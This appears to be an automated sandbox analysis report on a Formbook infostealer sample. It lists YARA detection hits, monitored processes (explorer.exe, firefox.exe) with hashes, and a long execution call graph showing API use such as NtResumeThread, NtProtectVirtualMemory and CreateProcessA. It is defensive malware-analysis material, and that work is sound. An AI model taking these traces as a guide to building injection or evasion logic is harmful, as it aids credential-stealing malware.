                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                          Target ID:29
                                                                                                                                                                          Start time:15:13:59
                                                                                                                                                                          Start date:05/12/2022
                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                          Imagebase:0x7ff657ff0000
                                                                                                                                                                          File size:4849904 bytes
                                                                                                                                                                          MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                          Target ID:30
                                                                                                                                                                          Start time:15:14:50
                                                                                                                                                                          Start date:05/12/2022
                                                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                          Imagebase:0x7ff6c7650000
                                                                                                                                                                          File size:597432 bytes
                                                                                                                                                                          MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:5.4%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:31.3%
                                                                                                                                                                            Signature Coverage:31.3%
                                                                                                                                                                            Total number of Nodes:1458
                                                                                                                                                                            Total number of Limit Nodes:118
                                                                                                                                                                            execution_graph 12048 3322732 12049 3321ea6 12048->12049 12062 3321dd7 12049->12062 12051 3322e78 12052 3341f72 12051->12052 12053 332328a 12051->12053 12054 3342d2f NtResumeThread 12052->12054 12059 334200d 12052->12059 12056 33232f8 NtResumeThread 12053->12056 12054->12059 12055 3347411 12057 33232f3 12056->12057 12076 33232f8 12057->12076 12059->12055 12060 3342220 NtResumeThread 12059->12060 12061 3342196 12060->12061 12063 3321e33 12062->12063 12064 3321dd7 NtResumeThread 12063->12064 12065 3322e78 12064->12065 12066 3341f72 12065->12066 12067 332328a 12065->12067 12068 3342d2f NtResumeThread 12066->12068 12073 334200d 12066->12073 12070 33232f8 NtResumeThread 12067->12070 12068->12073 12069 3347411 12069->12051 12071 33232f3 12070->12071 12072 33232f8 NtResumeThread 12071->12072 12072->12071 12073->12069 12074 3342220 NtResumeThread 12073->12074 12075 3342196 12074->12075 12075->12051 12077 33421ae 12076->12077 12079 334216c 12076->12079 12083 332330f 12077->12083 12080 33421c4 12079->12080 12081 3342220 NtResumeThread 12079->12081 12082 3342196 12081->12082 12082->12057 12084 332332e 12083->12084 12085 3342d2f NtResumeThread 12084->12085 12086 3323408 12085->12086 12087 3341f72 NtResumeThread 12086->12087 12088 332343b 12087->12088 12089 3341f72 NtResumeThread 12088->12089 12090 3323457 12089->12090 12093 3323467 12090->12093 12094 334644c NtResumeThread 12093->12094 12095 3323493 12094->12095 12095->12079 10786 401e44 10787 402a3a 18 API calls 10786->10787 10788 401e4a 10787->10788 10802 404f12 10788->10802 10792 401eb0 CloseHandle 10794 4026a6 10792->10794 10793 401e79 WaitForSingleObject 10795 401e5a 10793->10795 10796 401e87 GetExitCodeProcess 10793->10796 10795->10792 10795->10793 10795->10794 10816 4060ce 10795->10816 10797 401ea4 10796->10797 10798 401e99 10796->10798 10797->10792 10801 401ea2 10797->10801 10820 405c57 wsprintfA 10798->10820 10801->10792 10803 404f2d 10802->10803 10811 401e54 10802->10811 10804 404f4a lstrlenA 10803->10804 10805 405d1b 18 API calls 10803->10805 10806 404f73 10804->10806 10807 404f58 lstrlenA 10804->10807 10805->10804 10808 404f86 10806->10808 10809 404f79 SetWindowTextA 10806->10809 10810 404f6a lstrcatA 10807->10810 10807->10811 10808->10811 10812 404f8c SendMessageA SendMessageA SendMessageA 10808->10812 10809->10808 10810->10806 10813 40548a CreateProcessA 10811->10813 10812->10811 10814 4054c9 10813->10814 10815 4054bd CloseHandle 10813->10815 10814->10795 10815->10814 10817 4060eb PeekMessageA 10816->10817 10818 4060e1 DispatchMessageA 10817->10818 10819 4060fb 10817->10819 10818->10817 10819->10793 10820->10801 12135 402847 12136 402a1d 18 API calls 12135->12136 12137 40284d 12136->12137 12138 40287e 12137->12138 12139 4026a6 12137->12139 12141 40285b 12137->12141 12138->12139 12140 405d1b 18 API calls 12138->12140 12140->12139 12141->12139 12143 405c57 wsprintfA 12141->12143 12143->12139 11017 1000270b 11018 1000275b 11017->11018 11019 1000271b VirtualProtect 11017->11019 11019->11018 11269 401751 11270 402a3a 18 API calls 11269->11270 11271 401758 11270->11271 11272 401776 11271->11272 11273 40177e 11271->11273 11332 405cf9 lstrcpynA 11272->11332 11333 405cf9 lstrcpynA 11273->11333 11276 40177c 11280 405f64 5 API calls 11276->11280 11277 401789 11334 40576b lstrlenA CharPrevA 11277->11334 11286 40179b 11280->11286 11284 4017b2 CompareFileTime 11284->11286 11285 401876 11287 404f12 25 API calls 11285->11287 11286->11284 11286->11285 11289 405cf9 lstrcpynA 11286->11289 11295 405d1b 18 API calls 11286->11295 11304 40184d 11286->11304 11307 405947 GetFileAttributesA 11286->11307 11310 40596c GetFileAttributesA CreateFileA 11286->11310 11337 405ffd FindFirstFileA 11286->11337 11340 4054ef 11286->11340 11290 401880 11287->11290 11288 404f12 25 API calls 11305 401862 11288->11305 11289->11286 11311 402e9f 11290->11311 11293 4018a7 SetFileTime 11294 4018b9 CloseHandle 11293->11294 11296 4018ca 11294->11296 11294->11305 11295->11286 11297 4018e2 11296->11297 11298 4018cf 11296->11298 11300 405d1b 18 API calls 11297->11300 11299 405d1b 18 API calls 11298->11299 11301 4018d7 lstrcatA 11299->11301 11302 4018ea 11300->11302 11301->11302 11302->11305 11306 4054ef MessageBoxIndirectA 11302->11306 11304->11288 11304->11305 11306->11305 11308 405966 11307->11308 11309 405959 SetFileAttributesA 11307->11309 11308->11286 11309->11308 11310->11286 11313 402eb5 11311->11313 11312 402ee0 11344 40307b 11312->11344 11313->11312 11356 403091 SetFilePointer 11313->11356 11317 40301b 11319 40301f 11317->11319 11324 403037 11317->11324 11318 402efd GetTickCount 11328 402f10 11318->11328 11321 40307b ReadFile 11319->11321 11320 401893 11320->11293 11320->11294 11321->11320 11322 40307b ReadFile 11322->11324 11323 40307b ReadFile 11323->11328 11324->11320 11324->11322 11325 405a13 WriteFile 11324->11325 11325->11324 11327 402f76 GetTickCount 11327->11328 11328->11320 11328->11323 11328->11327 11329 402f9f MulDiv wsprintfA 11328->11329 11347 406195 11328->11347 11354 405a13 WriteFile 11328->11354 11330 404f12 25 API calls 11329->11330 11330->11328 11332->11276 11333->11277 11335 40178f lstrcatA 11334->11335 11336 405785 lstrcatA 11334->11336 11335->11276 11336->11335 11338 406013 FindClose 11337->11338 11339 40601e 11337->11339 11338->11339 11339->11286 11341 405504 11340->11341 11342 405550 11341->11342 11343 405518 MessageBoxIndirectA 11341->11343 11342->11286 11343->11342 11357 4059e4 ReadFile 11344->11357 11348 4061ba 11347->11348 11349 4061c2 11347->11349 11348->11328 11349->11348 11350 406252 GlobalAlloc 11349->11350 11351 406249 GlobalFree 11349->11351 11352 4062c0 GlobalFree 11349->11352 11353 4062c9 GlobalAlloc 11349->11353 11350->11348 11350->11349 11351->11350 11352->11353 11353->11348 11353->11349 11355 405a31 11354->11355 11355->11328 11356->11312 11358 402eeb 11357->11358 11358->11317 11358->11318 11358->11320 13008 401951 13009 402a1d 18 API calls 13008->13009 13010 401958 13009->13010 13011 402a1d 18 API calls 13010->13011 13012 401962 13011->13012 13013 402a3a 18 API calls 13012->13013 13014 40196b 13013->13014 13015 40197e lstrlenA 13014->13015 13016 4019b9 13014->13016 13017 401988 13015->13017 13017->13016 13021 405cf9 lstrcpynA 13017->13021 13019 4019a2 13019->13016 13020 4019af lstrlenA 13019->13020 13020->13016 13021->13019 11740 40255c 11741 402a1d 18 API calls 11740->11741 11747 402566 11741->11747 11742 4025d0 11743 4059e4 ReadFile 11743->11747 11744 4025d2 11749 405c57 wsprintfA 11744->11749 11746 4025e2 11746->11742 11748 4025f8 SetFilePointer 11746->11748 11747->11742 11747->11743 11747->11744 11747->11746 11748->11742 11749->11742 11857 402364 11858 40236a 11857->11858 11859 402a3a 18 API calls 11858->11859 11860 40237c 11859->11860 11861 402a3a 18 API calls 11860->11861 11862 402386 RegCreateKeyExA 11861->11862 11863 4023b0 11862->11863 11864 4026a6 11862->11864 11865 4023c8 11863->11865 11866 402a3a 18 API calls 11863->11866 11867 4023d4 11865->11867 11869 402a1d 18 API calls 11865->11869 11868 4023c1 lstrlenA 11866->11868 11870 4023ef RegSetValueExA 11867->11870 11871 402e9f 36 API calls 11867->11871 11868->11865 11869->11867 11872 402405 RegCloseKey 11870->11872 11871->11870 11872->11864 11908 3323d1b 11917 332906b 11908->11917 11910 3323d2b 11928 334557b 11910->11928 11913 3323d5b 11913->11913 11919 3329073 11917->11919 11920 33292da 11919->11920 11923 3324490 11919->11923 11957 33293ac 11919->11957 11920->11910 11921 33242c3 NtResumeThread 11921->11923 11922 334342c NtResumeThread 11922->11923 11923->11910 11923->11921 11923->11922 11924 3341720 11923->11924 11925 33286bd 11923->11925 11924->11910 11926 334342c NtResumeThread 11925->11926 11927 3328791 11926->11927 11927->11910 11929 33455c5 11928->11929 11930 3323d3a 11928->11930 11963 33455c9 11929->11963 11930->11913 11933 33433cb 11930->11933 11932 3345621 11934 3342d2f NtResumeThread 11933->11934 11935 33433df 11934->11935 11936 3323d56 11935->11936 11975 3341d09 11935->11975 11939 3340aef 11936->11939 11938 33477c8 11940 3341f72 NtResumeThread 11939->11940 11941 3340afe 11940->11941 11983 3341386 11941->11983 11943 3340b52 11944 334342c NtResumeThread 11943->11944 11945 3340b7b 11944->11945 11991 3340d52 11945->11991 11947 3343e11 NtResumeThread 11948 3343e0c 11947->11948 11950 3343e11 NtResumeThread 11948->11950 11949 3340b9b 11956 3340d1b 11949->11956 12001 3340ee5 11949->12001 11950->11948 11952 3340c28 11953 334342c NtResumeThread 11952->11953 11954 3340cf5 11953->11954 11955 3340d52 2 API calls 11954->11955 11955->11956 11956->11913 11956->11947 11958 33293b1 11957->11958 11958->11957 11959 3343e11 NtResumeThread 11958->11959 11962 3329482 11958->11962 11960 3343e0c 11959->11960 11961 3343e11 NtResumeThread 11960->11961 11961->11960 11962->11919 11964 3345616 11963->11964 11965 334561b 11964->11965 11967 33455cc 11964->11967 11965->11932 11968 33455e1 11967->11968 11970 3324490 11967->11970 11969 33242c3 NtResumeThread 11969->11970 11970->11969 11971 334342c NtResumeThread 11970->11971 11972 33286bd 11970->11972 11971->11970 11973 334342c NtResumeThread 11972->11973 11974 3328791 11973->11974 11974->11965 11977 3324490 11975->11977 11976 33242c3 NtResumeThread 11976->11977 11977->11938 11977->11976 11978 334342c NtResumeThread 11977->11978 11979 3341720 11977->11979 11980 33286bd 11977->11980 11978->11977 11979->11938 11981 334342c NtResumeThread 11980->11981 11982 3328791 11981->11982 11982->11938 11985 3324490 11983->11985 11987 3341720 11983->11987 11984 33242c3 NtResumeThread 11984->11985 11985->11943 11985->11983 11985->11984 11986 334342c NtResumeThread 11985->11986 11985->11987 11988 33286bd 11985->11988 11986->11985 11987->11943 11987->11987 11989 334342c NtResumeThread 11988->11989 11990 3328791 11989->11990 11990->11943 11992 3340e24 CreateFileA 11991->11992 11995 3324490 11991->11995 11992->11949 11994 3341720 11994->11949 11995->11949 11995->11994 11996 33242c3 NtResumeThread 11995->11996 11997 334342c NtResumeThread 11995->11997 11998 33286bd 11995->11998 11996->11995 11997->11995 11999 334342c NtResumeThread 11998->11999 12000 3328791 11999->12000 12000->11949 12004 3324490 12001->12004 12002 33242c3 NtResumeThread 12002->12004 12003 334342c NtResumeThread 12003->12004 12004->11952 12004->12002 12004->12003 12005 33286bd 12004->12005 12006 3341017 12004->12006 12007 334342c NtResumeThread 12005->12007 12006->11952 12006->12006 12008 3328791 12007->12008 12008->11952 12326 3325d03 12328 3325d7b 12326->12328 12327 33262ca 12329 3342d2f NtResumeThread 12327->12329 12332 334200d 12327->12332 12328->12327 12330 3347411 12328->12330 12331 334644c NtResumeThread 12328->12331 12329->12332 12335 3325fdd 12331->12335 12332->12330 12333 3342220 NtResumeThread 12332->12333 12334 3342196 12333->12334 12335->12327 12336 3343e00 12335->12336 12342 332625e 12335->12342 12343 3324490 12335->12343 12337 3343e11 NtResumeThread 12336->12337 12338 3343e0c 12337->12338 12339 3343e11 NtResumeThread 12338->12339 12339->12338 12340 334342c NtResumeThread 12340->12343 12341 3341f72 NtResumeThread 12341->12342 12342->12327 12342->12341 12343->12340 12344 33242c3 NtResumeThread 12343->12344 12345 33286bd 12343->12345 12344->12343 12346 334342c NtResumeThread 12345->12346 12347 3328791 12346->12347 13054 3325600 13056 3325611 13054->13056 13055 3343e11 NtResumeThread 13057 3343e0c 13055->13057 13056->13055 13058 3343e11 NtResumeThread 13057->13058 13058->13057 10869 402308 10870 402338 10869->10870 10871 40230d 10869->10871 10873 402a3a 18 API calls 10870->10873 10872 402b44 19 API calls 10871->10872 10874 402314 10872->10874 10875 40233f 10873->10875 10876 40231e 10874->10876 10880 402355 10874->10880 10881 402a7a RegOpenKeyExA 10875->10881 10877 402a3a 18 API calls 10876->10877 10878 402325 RegDeleteValueA RegCloseKey 10877->10878 10878->10880 10882 402b0e 10881->10882 10886 402aa5 10881->10886 10882->10880 10883 402acb RegEnumKeyA 10884 402add RegCloseKey 10883->10884 10883->10886 10892 406092 GetModuleHandleA 10884->10892 10885 402b02 RegCloseKey 10889 402af1 10885->10889 10886->10883 10886->10884 10886->10885 10888 402a7a 5 API calls 10886->10888 10888->10886 10889->10882 10891 402b1d RegDeleteKeyA 10891->10889 10893 4060b8 GetProcAddress 10892->10893 10894 4060ae 10892->10894 10897 402aed 10893->10897 10898 406024 GetSystemDirectoryA 10894->10898 10896 4060b4 10896->10893 10896->10897 10897->10889 10897->10891 10899 406046 wsprintfA LoadLibraryExA 10898->10899 10899->10896 10923 403a0b 10924 403a23 10923->10924 10925 403b5e 10923->10925 10924->10925 10926 403a2f 10924->10926 10927 403baf 10925->10927 10928 403b6f GetDlgItem GetDlgItem 10925->10928 10930 403a3a SetWindowPos 10926->10930 10931 403a4d 10926->10931 10929 403c09 10927->10929 10937 401389 2 API calls 10927->10937 10932 403ede 19 API calls 10928->10932 10933 403f2a SendMessageA 10929->10933 10954 403b59 10929->10954 10930->10931 10934 403a52 ShowWindow 10931->10934 10935 403a6a 10931->10935 10936 403b99 SetClassLongA 10932->10936 10961 403c1b 10933->10961 10934->10935 10938 403a72 DestroyWindow 10935->10938 10939 403a8c 10935->10939 10940 40140b 2 API calls 10936->10940 10941 403be1 10937->10941 10942 403e88 10938->10942 10943 403a91 SetWindowLongA 10939->10943 10944 403aa2 10939->10944 10940->10927 10941->10929 10947 403be5 SendMessageA 10941->10947 10953 403e98 ShowWindow 10942->10953 10942->10954 10943->10954 10945 403b4b 10944->10945 10946 403aae GetDlgItem 10944->10946 11003 403f45 10945->11003 10950 403ac1 SendMessageA IsWindowEnabled 10946->10950 10951 403ade 10946->10951 10947->10954 10948 40140b 2 API calls 10948->10961 10949 403e69 DestroyWindow EndDialog 10949->10942 10950->10951 10950->10954 10956 403aeb 10951->10956 10957 403b32 SendMessageA 10951->10957 10958 403afe 10951->10958 10968 403ae3 10951->10968 10953->10954 10955 405d1b 18 API calls 10955->10961 10956->10957 10956->10968 10957->10945 10962 403b06 10958->10962 10963 403b1b 10958->10963 10960 403b19 10960->10945 10961->10948 10961->10949 10961->10954 10961->10955 10964 403ede 19 API calls 10961->10964 10984 403da9 DestroyWindow 10961->10984 10994 403ede 10961->10994 10966 40140b 2 API calls 10962->10966 10965 40140b 2 API calls 10963->10965 10964->10961 10967 403b22 10965->10967 10966->10968 10967->10945 10967->10968 11000 403eb7 10968->11000 10970 403c96 GetDlgItem 10971 403cb3 ShowWindow KiUserCallbackDispatcher 10970->10971 10972 403cab 10970->10972 10997 403f00 EnableWindow 10971->10997 10972->10971 10974 403cdd EnableWindow 10978 403cf1 10974->10978 10975 403cf6 GetSystemMenu EnableMenuItem SendMessageA 10976 403d26 SendMessageA 10975->10976 10975->10978 10976->10978 10978->10975 10998 403f13 SendMessageA 10978->10998 10999 405cf9 lstrcpynA 10978->10999 10980 403d54 lstrlenA 10981 405d1b 18 API calls 10980->10981 10982 403d65 SetWindowTextA 10981->10982 10983 401389 2 API calls 10982->10983 10983->10961 10984->10942 10985 403dc3 CreateDialogParamA 10984->10985 10985->10942 10986 403df6 10985->10986 10987 403ede 19 API calls 10986->10987 10988 403e01 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 10987->10988 10989 401389 2 API calls 10988->10989 10990 403e47 10989->10990 10990->10954 10991 403e4f ShowWindow 10990->10991 10992 403f2a SendMessageA 10991->10992 10993 403e67 10992->10993 10993->10942 10995 405d1b 18 API calls 10994->10995 10996 403ee9 SetDlgItemTextA 10995->10996 10996->10970 10997->10974 10998->10978 10999->10980 11001 403ec4 SendMessageA 11000->11001 11002 403ebe 11000->11002 11001->10960 11002->11001 11004 403f5d GetWindowLongA 11003->11004 11014 403fe6 11003->11014 11005 403f6e 11004->11005 11004->11014 11006 403f80 11005->11006 11007 403f7d GetSysColor 11005->11007 11008 403f90 SetBkMode 11006->11008 11009 403f86 SetTextColor 11006->11009 11007->11006 11010 403fa8 GetSysColor 11008->11010 11011 403fae 11008->11011 11009->11008 11010->11011 11012 403fb5 SetBkColor 11011->11012 11013 403fbf 11011->11013 11012->11013 11013->11014 11015 403fd2 DeleteObject 11013->11015 11016 403fd9 CreateBrushIndirect 11013->11016 11014->10954 11015->11016 11016->11014 12415 402410 12416 402b44 19 API calls 12415->12416 12417 40241a 12416->12417 12418 402a3a 18 API calls 12417->12418 12419 402423 12418->12419 12420 40242d RegQueryValueExA 12419->12420 12425 4026a6 12419->12425 12421 402453 RegCloseKey 12420->12421 12422 40244d 12420->12422 12421->12425 12422->12421 12426 405c57 wsprintfA 12422->12426 12426->12421 11363 402616 11364 40261d 11363->11364 11365 40287c 11363->11365 11366 402a1d 18 API calls 11364->11366 11367 402628 11366->11367 11368 40262f SetFilePointer 11367->11368 11368->11365 11369 40263f 11368->11369 11371 405c57 wsprintfA 11369->11371 11371->11365 11750 3324352 EnumWindows 11753 332436a 11750->11753 11751 3324383 11753->11751 11755 33286bd 11753->11755 11758 33242c3 11753->11758 11767 334342c 11753->11767 11756 334342c NtResumeThread 11755->11756 11757 3328791 11756->11757 11759 3324300 11758->11759 11762 3324372 11758->11762 11760 3324383 11761 334342c NtResumeThread 11761->11762 11762->11760 11762->11761 11763 33242c3 NtResumeThread 11762->11763 11764 33286bd 11762->11764 11763->11762 11765 334342c NtResumeThread 11764->11765 11766 3328791 11765->11766 11766->11753 11768 334350f 11767->11768 11770 33435c5 11768->11770 11808 3341f72 11768->11808 11770->11753 11771 33242c3 NtResumeThread 11775 3324490 11771->11775 11773 3341f72 11778 334200d 11773->11778 11789 3342d2f 11773->11789 11775->11753 11775->11771 11777 334342c NtResumeThread 11775->11777 11785 3341720 11775->11785 11786 33286bd 11775->11786 11776 3343738 11776->11773 11776->11775 11781 3343dfd 11776->11781 11815 334644c 11776->11815 11777->11775 11778->11785 11800 3342220 11778->11800 11780 3342196 11780->11753 11782 3343e11 NtResumeThread 11781->11782 11783 3343e0c 11782->11783 11817 3343e11 11783->11817 11785->11753 11785->11785 11787 334342c NtResumeThread 11786->11787 11788 3328791 11787->11788 11788->11753 11792 3342dbd 11789->11792 11790 3342fc9 11790->11778 11792->11790 11795 3324490 11792->11795 11833 334305c 11792->11833 11793 33242c3 NtResumeThread 11793->11795 11794 334342c NtResumeThread 11794->11795 11795->11778 11795->11793 11795->11794 11796 3341720 11795->11796 11797 33286bd 11795->11797 11796->11778 11798 334342c NtResumeThread 11797->11798 11799 3328791 11798->11799 11799->11778 11802 334225a 11800->11802 11803 3324490 11800->11803 11801 33242c3 NtResumeThread 11801->11803 11802->11780 11803->11801 11804 334342c NtResumeThread 11803->11804 11805 33286bd 11803->11805 11804->11803 11806 334342c NtResumeThread 11805->11806 11807 3328791 11806->11807 11807->11780 11809 3341fe0 11808->11809 11812 334200d 11808->11812 11810 3342d2f NtResumeThread 11809->11810 11810->11812 11811 3347411 11811->11776 11811->11811 11812->11811 11813 3342220 NtResumeThread 11812->11813 11814 3342196 11813->11814 11814->11776 11845 3346451 11815->11845 11818 3343e1f 11817->11818 11818->11818 11819 3343e75 11818->11819 11820 3341f72 11818->11820 11849 3343eb3 11819->11849 11822 3342d2f NtResumeThread 11820->11822 11823 334200d 11820->11823 11822->11823 11824 3342220 NtResumeThread 11823->11824 11829 3341720 11823->11829 11825 3342196 11824->11825 11825->11783 11826 33242c3 NtResumeThread 11827 3324490 11826->11827 11827->11783 11827->11826 11828 334342c NtResumeThread 11827->11828 11827->11829 11830 33286bd 11827->11830 11828->11827 11829->11783 11831 334342c NtResumeThread 11830->11831 11832 3328791 11831->11832 11832->11783 11834 334308c 11833->11834 11836 334319a 11834->11836 11837 334319d 11834->11837 11836->11792 11838 33431f2 11837->11838 11839 3341f72 11837->11839 11838->11834 11839->11838 11840 3342d2f NtResumeThread 11839->11840 11842 334200d 11839->11842 11840->11842 11841 3347411 11841->11834 11841->11841 11842->11841 11843 3342220 NtResumeThread 11842->11843 11844 3342196 11843->11844 11844->11834 11846 3346545 11845->11846 11847 334672b NtResumeThread 11846->11847 11848 33467ee 11847->11848 11851 3324490 11849->11851 11850 33242c3 NtResumeThread 11850->11851 11851->11827 11851->11850 11852 334342c NtResumeThread 11851->11852 11853 3341720 11851->11853 11854 33286bd 11851->11854 11852->11851 11853->11827 11855 334342c NtResumeThread 11854->11855 11856 3328791 11855->11856 11856->11827 13296 3328e57 13297 3328e66 13296->13297 13298 3342d2f NtResumeThread 13297->13298 13300 334200d 13297->13300 13298->13300 13299 3347411 13300->13299 13301 3342220 NtResumeThread 13300->13301 13302 3342196 13301->13302 11874 334415c 11875 3341f72 NtResumeThread 11874->11875 11876 334416e 11875->11876 11877 3341f72 NtResumeThread 11876->11877 11892 3324490 11876->11892 11878 3344197 11877->11878 11879 33441d6 GetPEB 11878->11879 11880 3341f72 11878->11880 11878->11892 11881 334421b 11879->11881 11882 3342d2f NtResumeThread 11880->11882 11886 334200d 11880->11886 11885 3341720 11881->11885 11905 33451f3 11881->11905 11882->11886 11883 33242c3 NtResumeThread 11883->11892 11886->11885 11887 3342220 NtResumeThread 11886->11887 11888 3342196 11887->11888 11889 334342c NtResumeThread 11889->11892 11890 3344c5b 11895 3344fa7 11890->11895 11896 3344d1e 11890->11896 11891 334427f 11891->11880 11891->11885 11891->11890 11891->11892 11901 334471f 11891->11901 11892->11883 11892->11885 11892->11889 11902 33286bd 11892->11902 11893 33451f3 NtProtectVirtualMemory 11894 33451e8 11893->11894 11895->11893 11897 33451f3 NtProtectVirtualMemory 11896->11897 11899 3344fa2 11897->11899 11898 3344b53 11900 33451f3 NtProtectVirtualMemory 11898->11900 11900->11885 11901->11892 11901->11898 11903 334342c NtResumeThread 11902->11903 11904 3328791 11903->11904 11906 3345267 NtProtectVirtualMemory 11905->11906 11906->11891 12517 3329545 12518 33295ed 12517->12518 12519 334342c NtResumeThread 12518->12519 12520 3329627 12519->12520 12527 3341255 12520->12527 12522 332965d 12523 334342c NtResumeThread 12522->12523 12524 33296f4 12523->12524 12535 3329892 12524->12535 12526 3329884 12530 3324490 12527->12530 12528 334136c 12528->12522 12529 33242c3 NtResumeThread 12529->12530 12530->12528 12530->12529 12531 334342c NtResumeThread 12530->12531 12532 33286bd 12530->12532 12531->12530 12533 334342c NtResumeThread 12532->12533 12534 3328791 12533->12534 12534->12522 12536 33298e7 12535->12536 12544 3324490 12535->12544 12538 334644c NtResumeThread 12536->12538 12536->12544 12537 33242c3 NtResumeThread 12537->12544 12539 3329a5f 12538->12539 12540 3329e82 12539->12540 12541 3341f72 12539->12541 12549 3329ae8 12539->12549 12540->12526 12542 3342d2f NtResumeThread 12541->12542 12545 334200d 12541->12545 12542->12545 12543 3329e68 12543->12526 12544->12526 12544->12537 12544->12543 12546 334342c NtResumeThread 12544->12546 12553 33286bd 12544->12553 12545->12543 12547 3342220 NtResumeThread 12545->12547 12546->12544 12548 3342196 12547->12548 12548->12526 12549->12540 12549->12544 12550 334644c NtResumeThread 12549->12550 12551 3329c62 12549->12551 12550->12551 12551->12544 12552 334644c NtResumeThread 12551->12552 12552->12544 12554 334342c NtResumeThread 12553->12554 12555 3328791 12554->12555 12555->12526 12035 334644c 12036 3346451 NtResumeThread 12035->12036 13345 3328a49 13346 3328ac9 13345->13346 13347 334342c NtResumeThread 13346->13347 13348 3328b3e 13347->13348 13349 3341ab0 NtResumeThread 13348->13349 13350 3328b7f 13349->13350 13351 3347411 13350->13351 13352 3341255 NtResumeThread 13350->13352 13353 3328c3d 13352->13353 13354 3341255 NtResumeThread 13353->13354 13356 3328dd6 13354->13356 13355 3328e37 13356->13355 13357 3342d2f NtResumeThread 13356->13357 13358 334200d 13356->13358 13357->13358 13358->13351 13359 3342220 NtResumeThread 13358->13359 13360 3342196 13359->13360 12042 40173e 12043 402a3a 18 API calls 12042->12043 12044 401745 12043->12044 12045 40599b 2 API calls 12044->12045 12046 40174c 12045->12046 12047 40599b 2 API calls 12046->12047 12047->12046 12576 332294d 12577 3321ea6 12576->12577 12578 3321dd7 NtResumeThread 12577->12578 12579 3322e78 12578->12579 12580 3341f72 12579->12580 12581 332328a 12579->12581 12582 3342d2f NtResumeThread 12580->12582 12587 334200d 12580->12587 12584 33232f8 NtResumeThread 12581->12584 12582->12587 12583 3347411 12583->12583 12585 33232f3 12584->12585 12586 33232f8 NtResumeThread 12585->12586 12586->12585 12587->12583 12588 3342220 NtResumeThread 12587->12588 12589 3342196 12588->12589 13379 4027c1 13380 402a1d 18 API calls 13379->13380 13381 4027c7 13380->13381 13382 402802 13381->13382 13383 4027eb 13381->13383 13388 4026a6 13381->13388 13385 402818 13382->13385 13386 40280c 13382->13386 13384 4027f0 13383->13384 13392 4027ff 13383->13392 13393 405cf9 lstrcpynA 13384->13393 13387 405d1b 18 API calls 13385->13387 13389 402a1d 18 API calls 13386->13389 13387->13392 13389->13392 13392->13388 13394 405c57 wsprintfA 13392->13394 13393->13388 13394->13388 10862 4022c7 10863 402a3a 18 API calls 10862->10863 10864 4022d8 10863->10864 10865 402a3a 18 API calls 10864->10865 10866 4022e1 10865->10866 10867 402a3a 18 API calls 10866->10867 10868 4022eb GetPrivateProfileStringA 10867->10868 10901 401bca 10902 402a1d 18 API calls 10901->10902 10903 401bd1 10902->10903 10904 402a1d 18 API calls 10903->10904 10905 401bdb 10904->10905 10906 401beb 10905->10906 10907 402a3a 18 API calls 10905->10907 10908 401bfb 10906->10908 10911 402a3a 18 API calls 10906->10911 10907->10906 10909 401c06 10908->10909 10910 401c4a 10908->10910 10912 402a1d 18 API calls 10909->10912 10913 402a3a 18 API calls 10910->10913 10911->10908 10914 401c0b 10912->10914 10915 401c4f 10913->10915 10916 402a1d 18 API calls 10914->10916 10917 402a3a 18 API calls 10915->10917 10918 401c14 10916->10918 10919 401c58 FindWindowExA 10917->10919 10920 401c3a SendMessageA 10918->10920 10921 401c1c SendMessageTimeoutA 10918->10921 10922 401c76 10919->10922 10920->10922 10921->10922 11372 4014d6 11373 402a1d 18 API calls 11372->11373 11374 4014dc Sleep 11373->11374 11376 4028cf 11374->11376 11377 4030d9 SetErrorMode GetVersion 11378 403110 11377->11378 11379 403116 11377->11379 11380 406092 5 API calls 11378->11380 11381 406024 3 API calls 11379->11381 11380->11379 11382 40312c lstrlenA 11381->11382 11382->11379 11383 40313b 11382->11383 11384 406092 5 API calls 11383->11384 11385 403143 11384->11385 11386 406092 5 API calls 11385->11386 11387 40314a #17 OleInitialize SHGetFileInfoA 11386->11387 11465 405cf9 lstrcpynA 11387->11465 11389 403187 GetCommandLineA 11466 405cf9 lstrcpynA 11389->11466 11391 403199 GetModuleHandleA 11392 4031b0 11391->11392 11393 405796 CharNextA 11392->11393 11394 4031c4 CharNextA 11393->11394 11402 4031d4 11394->11402 11395 40329e 11396 4032b1 GetTempPathA 11395->11396 11467 4030a8 11396->11467 11398 4032c9 11399 403323 DeleteFileA 11398->11399 11400 4032cd GetWindowsDirectoryA lstrcatA 11398->11400 11477 402c66 GetTickCount GetModuleFileNameA 11399->11477 11403 4030a8 12 API calls 11400->11403 11401 405796 CharNextA 11401->11402 11402->11395 11402->11401 11406 4032a0 11402->11406 11405 4032e9 11403->11405 11405->11399 11408 4032ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 11405->11408 11561 405cf9 lstrcpynA 11406->11561 11407 403337 11409 4033cd 11407->11409 11412 4033bd 11407->11412 11416 405796 CharNextA 11407->11416 11411 4030a8 12 API calls 11408->11411 11578 40359f 11409->11578 11414 40331b 11411->11414 11505 403679 11412->11505 11414->11399 11414->11409 11420 403352 11416->11420 11418 403505 11422 403587 ExitProcess 11418->11422 11423 40350d 